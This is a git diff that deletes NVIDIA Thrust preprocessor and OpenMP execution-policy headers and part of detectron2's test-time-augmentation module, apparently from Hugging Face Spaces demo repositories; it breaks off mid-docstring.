THRUST_PP_CAT2(THRUST_PP_BOOL_IMPL_TAG, x) - -#define THRUST_PP_BOOL_IMPL_TAG0 0 -#define THRUST_PP_BOOL_IMPL_TAG1 1 -#define THRUST_PP_BOOL_IMPL_TAG2 1 -#define THRUST_PP_BOOL_IMPL_TAG3 1 -#define THRUST_PP_BOOL_IMPL_TAG4 1 -#define THRUST_PP_BOOL_IMPL_TAG5 1 -#define THRUST_PP_BOOL_IMPL_TAG6 1 -#define THRUST_PP_BOOL_IMPL_TAG7 1 -#define THRUST_PP_BOOL_IMPL_TAG8 1 -#define THRUST_PP_BOOL_IMPL_TAG9 1 -#define THRUST_PP_BOOL_IMPL_TAG10 1 -#define THRUST_PP_BOOL_IMPL_TAG11 1 -#define THRUST_PP_BOOL_IMPL_TAG12 1 -#define THRUST_PP_BOOL_IMPL_TAG13 1 -#define THRUST_PP_BOOL_IMPL_TAG14 1 -#define THRUST_PP_BOOL_IMPL_TAG15 1 -#define THRUST_PP_BOOL_IMPL_TAG16 1 -#define THRUST_PP_BOOL_IMPL_TAG17 1 -#define THRUST_PP_BOOL_IMPL_TAG18 1 -#define THRUST_PP_BOOL_IMPL_TAG19 1 -#define THRUST_PP_BOOL_IMPL_TAG20 1 -#define THRUST_PP_BOOL_IMPL_TAG21 1 -#define THRUST_PP_BOOL_IMPL_TAG22 1 -#define THRUST_PP_BOOL_IMPL_TAG23 1 -#define THRUST_PP_BOOL_IMPL_TAG24 1 -#define THRUST_PP_BOOL_IMPL_TAG25 1 -#define THRUST_PP_BOOL_IMPL_TAG26 1 -#define THRUST_PP_BOOL_IMPL_TAG27 1 -#define THRUST_PP_BOOL_IMPL_TAG28 1 -#define THRUST_PP_BOOL_IMPL_TAG29 1 -#define THRUST_PP_BOOL_IMPL_TAG30 1 -#define THRUST_PP_BOOL_IMPL_TAG31 1 -#define THRUST_PP_BOOL_IMPL_TAG32 1 -#define THRUST_PP_BOOL_IMPL_TAG33 1 -#define THRUST_PP_BOOL_IMPL_TAG34 1 -#define THRUST_PP_BOOL_IMPL_TAG35 1 -#define THRUST_PP_BOOL_IMPL_TAG36 1 -#define THRUST_PP_BOOL_IMPL_TAG37 1 -#define THRUST_PP_BOOL_IMPL_TAG38 1 -#define THRUST_PP_BOOL_IMPL_TAG39 1 -#define THRUST_PP_BOOL_IMPL_TAG40 1 -#define THRUST_PP_BOOL_IMPL_TAG41 1 -#define THRUST_PP_BOOL_IMPL_TAG42 1 -#define THRUST_PP_BOOL_IMPL_TAG43 1 -#define THRUST_PP_BOOL_IMPL_TAG44 1 -#define THRUST_PP_BOOL_IMPL_TAG45 1 -#define THRUST_PP_BOOL_IMPL_TAG46 1 -#define THRUST_PP_BOOL_IMPL_TAG47 1 -#define THRUST_PP_BOOL_IMPL_TAG48 1 -#define THRUST_PP_BOOL_IMPL_TAG49 1 -#define THRUST_PP_BOOL_IMPL_TAG50 1 -#define THRUST_PP_BOOL_IMPL_TAG51 1 -#define THRUST_PP_BOOL_IMPL_TAG52 1 -#define THRUST_PP_BOOL_IMPL_TAG53 1 -#define THRUST_PP_BOOL_IMPL_TAG54 1 -#define THRUST_PP_BOOL_IMPL_TAG55 1 -#define THRUST_PP_BOOL_IMPL_TAG56 1 -#define THRUST_PP_BOOL_IMPL_TAG57 1 -#define THRUST_PP_BOOL_IMPL_TAG58 1 -#define THRUST_PP_BOOL_IMPL_TAG59 1 -#define THRUST_PP_BOOL_IMPL_TAG60 1 -#define THRUST_PP_BOOL_IMPL_TAG61 1 -#define THRUST_PP_BOOL_IMPL_TAG62 1 -#define THRUST_PP_BOOL_IMPL_TAG63 1 -#define THRUST_PP_BOOL_IMPL_TAG64 1 -#define THRUST_PP_BOOL_IMPL_TAG65 1 -#define THRUST_PP_BOOL_IMPL_TAG66 1 -#define THRUST_PP_BOOL_IMPL_TAG67 1 -#define THRUST_PP_BOOL_IMPL_TAG68 1 -#define THRUST_PP_BOOL_IMPL_TAG69 1 -#define THRUST_PP_BOOL_IMPL_TAG70 1 -#define THRUST_PP_BOOL_IMPL_TAG71 1 -#define THRUST_PP_BOOL_IMPL_TAG72 1 -#define THRUST_PP_BOOL_IMPL_TAG73 1 -#define THRUST_PP_BOOL_IMPL_TAG74 1 -#define THRUST_PP_BOOL_IMPL_TAG75 1 -#define THRUST_PP_BOOL_IMPL_TAG76 1 -#define THRUST_PP_BOOL_IMPL_TAG77 1 -#define THRUST_PP_BOOL_IMPL_TAG78 1 -#define THRUST_PP_BOOL_IMPL_TAG79 1 -#define THRUST_PP_BOOL_IMPL_TAG80 1 -#define THRUST_PP_BOOL_IMPL_TAG81 1 -#define THRUST_PP_BOOL_IMPL_TAG82 1 -#define THRUST_PP_BOOL_IMPL_TAG83 1 -#define THRUST_PP_BOOL_IMPL_TAG84 1 -#define THRUST_PP_BOOL_IMPL_TAG85 1 -#define THRUST_PP_BOOL_IMPL_TAG86 1 -#define THRUST_PP_BOOL_IMPL_TAG87 1 -#define THRUST_PP_BOOL_IMPL_TAG88 1 -#define THRUST_PP_BOOL_IMPL_TAG89 1 -#define THRUST_PP_BOOL_IMPL_TAG90 1 -#define THRUST_PP_BOOL_IMPL_TAG91 1 -#define THRUST_PP_BOOL_IMPL_TAG92 1 -#define THRUST_PP_BOOL_IMPL_TAG93 1 -#define THRUST_PP_BOOL_IMPL_TAG94 1 -#define THRUST_PP_BOOL_IMPL_TAG95 1 -#define THRUST_PP_BOOL_IMPL_TAG96 1 -#define THRUST_PP_BOOL_IMPL_TAG97 1 -#define THRUST_PP_BOOL_IMPL_TAG98 1 -#define THRUST_PP_BOOL_IMPL_TAG99 1 -#define THRUST_PP_BOOL_IMPL_TAG100 1 -#define THRUST_PP_BOOL_IMPL_TAG101 1 -#define THRUST_PP_BOOL_IMPL_TAG102 1 -#define THRUST_PP_BOOL_IMPL_TAG103 1 -#define THRUST_PP_BOOL_IMPL_TAG104 1 -#define THRUST_PP_BOOL_IMPL_TAG105 1 -#define THRUST_PP_BOOL_IMPL_TAG106 1 -#define THRUST_PP_BOOL_IMPL_TAG107 1 -#define THRUST_PP_BOOL_IMPL_TAG108 1 -#define THRUST_PP_BOOL_IMPL_TAG109 1 -#define THRUST_PP_BOOL_IMPL_TAG110 1 -#define THRUST_PP_BOOL_IMPL_TAG111 1 -#define THRUST_PP_BOOL_IMPL_TAG112 1 -#define THRUST_PP_BOOL_IMPL_TAG113 1 -#define THRUST_PP_BOOL_IMPL_TAG114 1 -#define THRUST_PP_BOOL_IMPL_TAG115 1 -#define THRUST_PP_BOOL_IMPL_TAG116 1 -#define THRUST_PP_BOOL_IMPL_TAG117 1 -#define THRUST_PP_BOOL_IMPL_TAG118 1 -#define THRUST_PP_BOOL_IMPL_TAG119 1 -#define THRUST_PP_BOOL_IMPL_TAG120 1 -#define THRUST_PP_BOOL_IMPL_TAG121 1 -#define THRUST_PP_BOOL_IMPL_TAG122 1 -#define THRUST_PP_BOOL_IMPL_TAG123 1 -#define THRUST_PP_BOOL_IMPL_TAG124 1 -#define THRUST_PP_BOOL_IMPL_TAG125 1 -#define THRUST_PP_BOOL_IMPL_TAG126 1 -#define THRUST_PP_BOOL_IMPL_TAG127 1 -#define THRUST_PP_BOOL_IMPL_TAG128 1 -#define THRUST_PP_BOOL_IMPL_TAG129 1 -#define THRUST_PP_BOOL_IMPL_TAG130 1 -#define THRUST_PP_BOOL_IMPL_TAG131 1 -#define THRUST_PP_BOOL_IMPL_TAG132 1 -#define THRUST_PP_BOOL_IMPL_TAG133 1 -#define THRUST_PP_BOOL_IMPL_TAG134 1 -#define THRUST_PP_BOOL_IMPL_TAG135 1 -#define THRUST_PP_BOOL_IMPL_TAG136 1 -#define THRUST_PP_BOOL_IMPL_TAG137 1 -#define THRUST_PP_BOOL_IMPL_TAG138 1 -#define THRUST_PP_BOOL_IMPL_TAG139 1 -#define THRUST_PP_BOOL_IMPL_TAG140 1 -#define THRUST_PP_BOOL_IMPL_TAG141 1 -#define THRUST_PP_BOOL_IMPL_TAG142 1 -#define THRUST_PP_BOOL_IMPL_TAG143 1 -#define THRUST_PP_BOOL_IMPL_TAG144 1 -#define THRUST_PP_BOOL_IMPL_TAG145 1 -#define THRUST_PP_BOOL_IMPL_TAG146 1 -#define THRUST_PP_BOOL_IMPL_TAG147 1 -#define THRUST_PP_BOOL_IMPL_TAG148 1 -#define THRUST_PP_BOOL_IMPL_TAG149 1 -#define THRUST_PP_BOOL_IMPL_TAG150 1 -#define THRUST_PP_BOOL_IMPL_TAG151 1 -#define THRUST_PP_BOOL_IMPL_TAG152 1 -#define THRUST_PP_BOOL_IMPL_TAG153 1 -#define THRUST_PP_BOOL_IMPL_TAG154 1 -#define THRUST_PP_BOOL_IMPL_TAG155 1 -#define THRUST_PP_BOOL_IMPL_TAG156 1 -#define THRUST_PP_BOOL_IMPL_TAG157 1 -#define THRUST_PP_BOOL_IMPL_TAG158 1 -#define THRUST_PP_BOOL_IMPL_TAG159 1 -#define THRUST_PP_BOOL_IMPL_TAG160 1 -#define THRUST_PP_BOOL_IMPL_TAG161 1 -#define THRUST_PP_BOOL_IMPL_TAG162 1 -#define THRUST_PP_BOOL_IMPL_TAG163 1 -#define THRUST_PP_BOOL_IMPL_TAG164 1 -#define THRUST_PP_BOOL_IMPL_TAG165 1 -#define THRUST_PP_BOOL_IMPL_TAG166 1 -#define THRUST_PP_BOOL_IMPL_TAG167 1 -#define THRUST_PP_BOOL_IMPL_TAG168 1 -#define THRUST_PP_BOOL_IMPL_TAG169 1 -#define THRUST_PP_BOOL_IMPL_TAG170 1 -#define THRUST_PP_BOOL_IMPL_TAG171 1 -#define THRUST_PP_BOOL_IMPL_TAG172 1 -#define THRUST_PP_BOOL_IMPL_TAG173 1 -#define THRUST_PP_BOOL_IMPL_TAG174 1 -#define THRUST_PP_BOOL_IMPL_TAG175 1 -#define THRUST_PP_BOOL_IMPL_TAG176 1 -#define THRUST_PP_BOOL_IMPL_TAG177 1 -#define THRUST_PP_BOOL_IMPL_TAG178 1 -#define THRUST_PP_BOOL_IMPL_TAG179 1 -#define THRUST_PP_BOOL_IMPL_TAG180 1 -#define THRUST_PP_BOOL_IMPL_TAG181 1 -#define THRUST_PP_BOOL_IMPL_TAG182 1 -#define THRUST_PP_BOOL_IMPL_TAG183 1 -#define THRUST_PP_BOOL_IMPL_TAG184 1 -#define THRUST_PP_BOOL_IMPL_TAG185 1 -#define THRUST_PP_BOOL_IMPL_TAG186 1 -#define THRUST_PP_BOOL_IMPL_TAG187 1 -#define THRUST_PP_BOOL_IMPL_TAG188 1 -#define THRUST_PP_BOOL_IMPL_TAG189 1 -#define THRUST_PP_BOOL_IMPL_TAG190 1 -#define THRUST_PP_BOOL_IMPL_TAG191 1 -#define THRUST_PP_BOOL_IMPL_TAG192 1 -#define THRUST_PP_BOOL_IMPL_TAG193 1 -#define THRUST_PP_BOOL_IMPL_TAG194 1 -#define THRUST_PP_BOOL_IMPL_TAG195 1 -#define THRUST_PP_BOOL_IMPL_TAG196 1 -#define THRUST_PP_BOOL_IMPL_TAG197 1 -#define THRUST_PP_BOOL_IMPL_TAG198 1 -#define THRUST_PP_BOOL_IMPL_TAG199 1 -#define THRUST_PP_BOOL_IMPL_TAG200 1 -#define THRUST_PP_BOOL_IMPL_TAG201 1 -#define THRUST_PP_BOOL_IMPL_TAG202 1 -#define THRUST_PP_BOOL_IMPL_TAG203 1 -#define THRUST_PP_BOOL_IMPL_TAG204 1 -#define THRUST_PP_BOOL_IMPL_TAG205 1 -#define THRUST_PP_BOOL_IMPL_TAG206 1 -#define THRUST_PP_BOOL_IMPL_TAG207 1 -#define THRUST_PP_BOOL_IMPL_TAG208 1 -#define THRUST_PP_BOOL_IMPL_TAG209 1 -#define THRUST_PP_BOOL_IMPL_TAG210 1 -#define THRUST_PP_BOOL_IMPL_TAG211 1 -#define THRUST_PP_BOOL_IMPL_TAG212 1 -#define THRUST_PP_BOOL_IMPL_TAG213 1 -#define THRUST_PP_BOOL_IMPL_TAG214 1 -#define THRUST_PP_BOOL_IMPL_TAG215 1 -#define THRUST_PP_BOOL_IMPL_TAG216 1 -#define THRUST_PP_BOOL_IMPL_TAG217 1 -#define THRUST_PP_BOOL_IMPL_TAG218 1 -#define THRUST_PP_BOOL_IMPL_TAG219 1 -#define THRUST_PP_BOOL_IMPL_TAG220 1 -#define THRUST_PP_BOOL_IMPL_TAG221 1 -#define THRUST_PP_BOOL_IMPL_TAG222 1 -#define THRUST_PP_BOOL_IMPL_TAG223 1 -#define THRUST_PP_BOOL_IMPL_TAG224 1 -#define THRUST_PP_BOOL_IMPL_TAG225 1 -#define THRUST_PP_BOOL_IMPL_TAG226 1 -#define THRUST_PP_BOOL_IMPL_TAG227 1 -#define THRUST_PP_BOOL_IMPL_TAG228 1 -#define THRUST_PP_BOOL_IMPL_TAG229 1 -#define THRUST_PP_BOOL_IMPL_TAG230 1 -#define THRUST_PP_BOOL_IMPL_TAG231 1 -#define THRUST_PP_BOOL_IMPL_TAG232 1 -#define THRUST_PP_BOOL_IMPL_TAG233 1 -#define THRUST_PP_BOOL_IMPL_TAG234 1 -#define THRUST_PP_BOOL_IMPL_TAG235 1 -#define THRUST_PP_BOOL_IMPL_TAG236 1 -#define THRUST_PP_BOOL_IMPL_TAG237 1 -#define THRUST_PP_BOOL_IMPL_TAG238 1 -#define THRUST_PP_BOOL_IMPL_TAG239 1 -#define THRUST_PP_BOOL_IMPL_TAG240 1 -#define THRUST_PP_BOOL_IMPL_TAG241 1 -#define THRUST_PP_BOOL_IMPL_TAG242 1 -#define THRUST_PP_BOOL_IMPL_TAG243 1 -#define THRUST_PP_BOOL_IMPL_TAG244 1 -#define THRUST_PP_BOOL_IMPL_TAG245 1 -#define THRUST_PP_BOOL_IMPL_TAG246 1 -#define THRUST_PP_BOOL_IMPL_TAG247 1 -#define THRUST_PP_BOOL_IMPL_TAG248 1 -#define THRUST_PP_BOOL_IMPL_TAG249 1 -#define THRUST_PP_BOOL_IMPL_TAG250 1 -#define THRUST_PP_BOOL_IMPL_TAG251 1 -#define THRUST_PP_BOOL_IMPL_TAG252 1 -#define THRUST_PP_BOOL_IMPL_TAG253 1 -#define THRUST_PP_BOOL_IMPL_TAG254 1 -#define THRUST_PP_BOOL_IMPL_TAG255 1 -#define THRUST_PP_BOOL_IMPL_TAG256 1 - -/////////////////////////////////////////////////////////////////////////////// - -#define THRUST_PP_IIF(bit, t, f) THRUST_PP_IIF_IMPL0(bit, t, f) - -#if defined(_MSC_VER) - #define THRUST_PP_IIF_IMPL0(bit, t, f) \ - THRUST_PP_IIF_IMPL1(THRUST_PP_CAT2(THRUST_PP_IIF_IMPL_TAG, bit(t, f))) \ - /**/ - #define THRUST_PP_IIF_IMPL1(id) id -#else - #define THRUST_PP_IIF_IMPL0(bit, t, f) \ - THRUST_PP_CAT2(THRUST_PP_IIF_IMPL_TAG, bit(t, f)) - /**/ -#endif - -#define THRUST_PP_IIF_IMPL_TAG0(t, f) f -#define THRUST_PP_IIF_IMPL_TAG1(t, f) t - -#if defined(__EDG__) - #define THRUST_PP_IF(cond, t, f) THRUST_PP_IF_IMPL0(cond, t, f) - #define THRUST_PP_IF_IMPL0(cond, t, f) \ - THRUST_PP_IIF(THRUST_PP_BOOL(cond), t, f) \ - /**/ -#else - #define THRUST_PP_IF(cond, t, f) THRUST_PP_IIF(THRUST_PP_BOOL(cond), t, f) -#endif - -/// \def THRUST_COMMA_IF(cond) -/// \brief If \a cond is true, expands to a comma. Otherwise, expands to nothing. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_STRINGIZE(THRUST_COMMA_IF(0)) << "\n" -/// << THRUST_PP_STRINGIZE(THRUST_COMMA_IF(1)) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << "" << "\n" -/// << "," << "\n"; -/// } -/// \endcode -/// -#if defined(__EDG__) - #define THRUST_PP_COMMA_IF(cond) THRUST_PP_COMMA_IF_IMPL0(cond) - #define THRUST_PP_COMMA_IF_IMPL0(cond) \ - THRUST_PP_IF(cond, THRUST_PP_COMMA, THRUST_PP_EMPTY)() \ - /**/ -#else - #define THRUST_PP_COMMA_IF(cond) \ - THRUST_PP_IF(cond, THRUST_PP_COMMA, THRUST_PP_EMPTY)() \ - /**/ -#endif - -/////////////////////////////////////////////////////////////////////////////// - -// http://gustedt.wordpress.com/2010/06/08/detect-empty-macro-arguments - -#define THRUST_PP_64TH_ARG( \ - _1, _2, _3, _4, _5, _6, _7, _8, _9,_10,_11,_12,_13,_14,_15,_16 \ - , _17,_18,_19,_20,_21,_22,_23,_24,_25,_26,_27,_28,_29,_30,_31,_32 \ - , _33,_34,_35,_36,_37,_38,_39,_40,_41,_42,_43,_44,_45,_46,_47,_48 \ - , _49,_50,_51,_52,_53,_54,_55,_56,_57,_58,_59,_60,_61,_62,_63, N \ - , ... \ - ) N \ - /**/ - -#define THRUST_PP_HAS_COMMA(...) \ - THRUST_PP_EXPAND(THRUST_PP_64TH_ARG( \ - __VA_ARGS__ \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,0 \ - )) \ - /**/ - -#define THRUST_PP_TRIGGER_PAREN(...) , - -#define THRUST_PP_IS_VARIADIC_NULLARY(...) \ - THRUST_PP_IS_VARIADIC_NULLARY_IMPL0( \ - /* Test if there is just one argument, eventually an empty one. */ \ - THRUST_PP_HAS_COMMA(__VA_ARGS__), \ - /* Test if THRUST_PP_TRIGGER_PAREN together with the argument adds a */ \ - /* comma. */ \ - THRUST_PP_HAS_COMMA(THRUST_PP_TRIGGER_PAREN __VA_ARGS__), \ - /* Test if the argument together with a parenthesis adds a comma. */ \ - THRUST_PP_HAS_COMMA(__VA_ARGS__ (/*empty*/)), \ - /* Test if placing it between THRUST_PP_TRIGGER_PAREN and the */ \ - /* parenthesis adds a comma. */ \ - THRUST_PP_HAS_COMMA(THRUST_PP_TRIGGER_PAREN __VA_ARGS__ (/*empty*/)) \ - ) \ - /**/ - -#define THRUST_PP_IS_VARIADIC_NULLARY_IMPL0(_0, _1, _2, _3) \ - THRUST_PP_HAS_COMMA( \ - THRUST_PP_CAT5(THRUST_PP_IS_VARIADIC_NULLARY_IMPL_TAG, _0, _1, _2, _3) \ - ) \ - -#define THRUST_PP_IS_VARIADIC_NULLARY_IMPL_TAG0001 , - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_ARITY(...) -/// \brief Returns the number of arguments that it was called with. Must be -/// called with less than 64 arguments. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_ARITY() << "\n" -/// << THRUST_PP_ARITY(x) << "\n" -/// << THRUST_PP_ARITY(x, y) << "\n" -/// << THRUST_PP_ARITY(x, y, z) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << 0 << "\n" -/// << 1 << "\n" -/// << 2 << "\n" -/// << 3 << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_ARITY(...) \ - THRUST_PP_EXPAND( \ - THRUST_PP_IF( \ - THRUST_PP_IS_VARIADIC_NULLARY(__VA_ARGS__) \ - , 0 \ - , THRUST_PP_64TH_ARG( \ - __VA_ARGS__ \ - , 63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48 \ - , 47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32 \ - , 31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16 \ - , 15,14,13,12,11,10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 \ - ) \ - ) \ - ) \ - /**/ - -/// \def THRUST_PP_DISPATCH(basename, ...) -/// \brief Expands to basenameN(...), where N is the -/// number of variadic arguments that \a THRUST_PP_DISPATCH was called -/// with. This macro can be used to implement "macro overloading". -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// #define PLUS(...) THRUST_PP_DISPATCH(PLUS, __VA_ARGS__) -/// #define PLUS0() 0 -/// #define PLUS1(x) x -/// #define PLUS2(x, y) x + y -/// #define PLUS3(x, y, z) x + y + z -/// -/// int main() -/// { -/// std::cout << PLUS() << "\n" -/// << PLUS(1) << "\n" -/// << PLUS(1, 2) << "\n" -/// << PLUS(1, 2, 3) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << 0 << "\n" -/// << 1 << "\n" -/// << 1 + 2 << "\n" -/// << 1 + 2 + 3 << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_DISPATCH(basename, ...) \ - THRUST_PP_EXPAND( \ - THRUST_PP_CAT2( \ - basename, \ - THRUST_PP_ARITY(__VA_ARGS__) \ - )(__VA_ARGS__) \ - ) \ - /**/ - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_CURRENT_FUNCTION -/// \brief The name of the current function as a string. -/// -#if defined(__GNUC__) \ - || (defined(__MWERKS__) && (__MWERKS__ >= 0x3000)) \ - || (defined(__ICC) && (__ICC >= 600)) || defined(__ghs__) - #define THRUST_CURRENT_FUNCTION __PRETTY_FUNCTION__ -#elif defined(__DMC__) && (__DMC__ >= 0x810) - #define THRUST_CURRENT_FUNCTION __PRETTY_FUNCTION__ -#elif defined(__FUNCSIG__) - #define THRUST_CURRENT_FUNCTION __FUNCSIG__ -#elif (defined(__INTEL_COMPILER) && (__INTEL_COMPILER >= 600)) \ - || (defined(__IBMCTHRUST_PP__) && (__IBMCTHRUST_PP__ >= 500)) - #define THRUST_CURRENT_FUNCTION __FUNCTION__ -#elif defined(__BORLANDC__) && (__BORLANDC__ >= 0x550) - #define THRUST_CURRENT_FUNCTION __FUNC__ -#elif defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901) - #define THRUST_CURRENT_FUNCTION __func__ -#elif defined(__cplusplus) && (__cplusplus >= 201103) - #define THRUST_CURRENT_FUNCTION __func__ -#else - #define THRUST_CURRENT_FUNCTION "(unknown)" -#endif - -/////////////////////////////////////////////////////////////////////////////// - diff --git a/spaces/CVPR/LIVE/thrust/thrust/detail/use_default.h b/spaces/CVPR/LIVE/thrust/thrust/detail/use_default.h deleted file mode 100644 index ba2c27bc58bb4abe62945587eb94238f7988b341..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/detail/use_default.h +++ /dev/null @@ -1,27 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -namespace thrust -{ - -struct use_default {}; - -} // end thrust - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/execution_policy.h b/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/execution_policy.h deleted file mode 100644 index 52c879a168551227c059416d4b80fde69491bfa4..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/execution_policy.h +++ /dev/null @@ -1,107 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include -#include -#include -#include -#include - -namespace thrust -{ -namespace system -{ -// put the canonical tag in the same ns as the backend's entry points -namespace omp -{ -namespace detail -{ - -// this awkward sequence of definitions arise -// from the desire both for tag to derive -// from execution_policy and for execution_policy -// to convert to tag (when execution_policy is not -// an ancestor of tag) - -// forward declaration of tag -struct tag; - -// forward declaration of execution_policy -template struct execution_policy; - -// specialize execution_policy for tag -template<> - struct execution_policy - : thrust::system::cpp::detail::execution_policy -{}; - -// tag's definition comes before the -// generic definition of execution_policy -struct tag : execution_policy {}; - -// allow conversion to tag when it is not a successor -template - struct execution_policy - : thrust::system::cpp::detail::execution_policy -{ - typedef tag tag_type; - operator tag() const { return tag(); } -}; - - -// overloads of select_system - -// XXX select_system(tbb, omp) & select_system(omp, tbb) are ambiguous -// because both convert to cpp without these overloads, which we -// arbitrarily define in the omp backend - -template -inline __host__ __device__ - System1 select_system(execution_policy s, thrust::system::tbb::detail::execution_policy) -{ - return thrust::detail::derived_cast(s); -} // end select_system() - - -template -inline __host__ __device__ - System2 select_system(thrust::system::tbb::detail::execution_policy, execution_policy s) -{ - return thrust::detail::derived_cast(s); -} // end select_system() - - -} // end detail - -// alias execution_policy and tag here -using thrust::system::omp::detail::execution_policy; -using thrust::system::omp::detail::tag; - -} // end omp -} // end system - -// alias items at top-level -namespace omp -{ - -using thrust::system::omp::execution_policy; -using thrust::system::omp::tag; - -} // end omp -} // end thrust - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/transform_scan.h b/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/transform_scan.h deleted file mode 100644 index 75b075b6b16f063a1c5cda8893911d3f3c533f2d..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/transform_scan.h +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system inherits transform_scan -#include - diff --git a/spaces/CVPR/regionclip-demo/detectron2/modeling/test_time_augmentation.py b/spaces/CVPR/regionclip-demo/detectron2/modeling/test_time_augmentation.py deleted file mode 100644 index 373e6bf00a39c040ff1da49d6dcd39a54a0b69a7..0000000000000000000000000000000000000000 --- a/spaces/CVPR/regionclip-demo/detectron2/modeling/test_time_augmentation.py +++ /dev/null @@ -1,307 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import copy -import numpy as np -from contextlib import contextmanager -from itertools import count -from typing import List -import torch -from fvcore.transforms import HFlipTransform, NoOpTransform -from torch import nn -from torch.nn.parallel import DistributedDataParallel - -from detectron2.config import configurable -from detectron2.data.detection_utils import read_image -from detectron2.data.transforms import ( - RandomFlip, - ResizeShortestEdge, - ResizeTransform, - apply_augmentations, -) -from detectron2.structures import Boxes, Instances - -from .meta_arch import GeneralizedRCNN -from .postprocessing import detector_postprocess -from .roi_heads.fast_rcnn import fast_rcnn_inference_single_image - -__all__ = ["DatasetMapperTTA", "GeneralizedRCNNWithTTA"] - - -class DatasetMapperTTA: - """ - Implement test-time augmentation for detection data. - It is a callable which takes a dataset dict from a detection dataset, - and returns a list of dataset dicts where the images - are augmented from the input image by the transformations defined in the config. - This is used for test-time augmentation. - """ - - @configurable - def __init__(self, min_sizes: List[int], max_size: int, flip: bool): - """ - Args: - min_sizes: list of short-edge size to resize the image to - max_size: maximum height or width of resized images - flip: whether to apply flipping augmentation - """ - self.min_sizes = min_sizes - self.max_size = max_size - self.flip = flip - - @classmethod - def from_config(cls, cfg): - return { - "min_sizes": cfg.TEST.AUG.MIN_SIZES, - "max_size": cfg.TEST.AUG.MAX_SIZE, - "flip": cfg.TEST.AUG.FLIP, - } - - def __call__(self, dataset_dict): - """ - Args: - dict: a dict in standard model input format. See tutorials for details. - - Returns: - list[dict]: - a list of dicts, which contain augmented version of the input image. - The total number of dicts is ``len(min_sizes) * (2 if flip else 1)``. - Each dict has field "transforms" which is a TransformList, - containing the transforms that are used to generate this image. - """ - numpy_image = dataset_dict["image"].permute(1, 2, 0).numpy() - shape = numpy_image.shape - orig_shape = (dataset_dict["height"], dataset_dict["width"]) - if shape[:2] != orig_shape: - # It transforms the "original" image in the dataset to the input image - pre_tfm = ResizeTransform(orig_shape[0], orig_shape[1], shape[0], shape[1]) - else: - pre_tfm = NoOpTransform() - - # Create all combinations of augmentations to use - aug_candidates = [] # each element is a list[Augmentation] - for min_size in self.min_sizes: - resize = ResizeShortestEdge(min_size, self.max_size) - aug_candidates.append([resize]) # resize only - if self.flip: - flip = RandomFlip(prob=1.0) - aug_candidates.append([resize, flip]) # resize + flip - - # Apply all the augmentations - ret = [] - for aug in aug_candidates: - new_image, tfms = apply_augmentations(aug, np.copy(numpy_image)) - torch_image = torch.from_numpy(np.ascontiguousarray(new_image.transpose(2, 0, 1))) - - dic = copy.deepcopy(dataset_dict) - dic["transforms"] = pre_tfm + tfms - dic["image"] = torch_image - ret.append(dic) - return ret - - -class GeneralizedRCNNWithTTA(nn.Module): - """ - A GeneralizedRCNN with test-time augmentation enabled. - Its :meth:`__call__` method has the same interface as :meth:`GeneralizedRCNN.forward`. - """ - - def __init__(self, cfg, model, tta_mapper=None, batch_size=3): - """ - Args: - cfg (CfgNode): - model 